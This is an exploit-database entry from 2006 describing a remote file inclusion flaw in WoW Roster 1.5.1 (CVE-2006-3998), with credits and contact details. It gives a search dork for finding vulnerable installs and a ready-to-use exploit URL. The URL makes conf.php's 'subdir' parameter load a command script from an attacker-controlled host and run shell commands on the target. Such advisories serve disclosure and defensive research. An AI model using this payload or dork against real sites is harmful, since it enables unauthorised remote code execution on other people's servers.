WoW Roster 1.5.1 - 'subdir' Remote File Inclusion

Author: skulmatic
type: webapps
platform: php
port: 
date_added: 2006-07-31 
date_updated:  
verified: 1 
codes: OSVDB-27759;CVE-2006-3998 
tags: 
aliases:  
screenshot_url:  
application_url: 

--------------------------------------------------------------------------------
Title : WoW Roster <= 1.5.1 Remote File Include Vulnerabilities
###############################################################################
Discovered By Skulmatic
-----------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application :  World of Warcraft (WoW) Roster
URL :  http://www.wowroster.net/
-----------------------------------------------------------------------------

dork        : "wow roster version 1.5.*"
Exploit     :
http://[target]/[wow_roster_path]/conf.php?subdir=http://[attacker]/cmd.txt?&cmd=ls

------------------------------------------------------------------------------

greatz:
~~~~
# special to song hye kyo (for inspiration)
# To all members of #papmahackerlink and #hackid, OLiBekaS, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster.
-------------------------------------------------------------------------------

Contact:
~~~~~~
Nick: skulmatic
E-mail: skulmatic[at]gmail[dot]Com

--------------------------------- [ eof ] ---------------------------------------

# milw0rm.com [2006-08-01]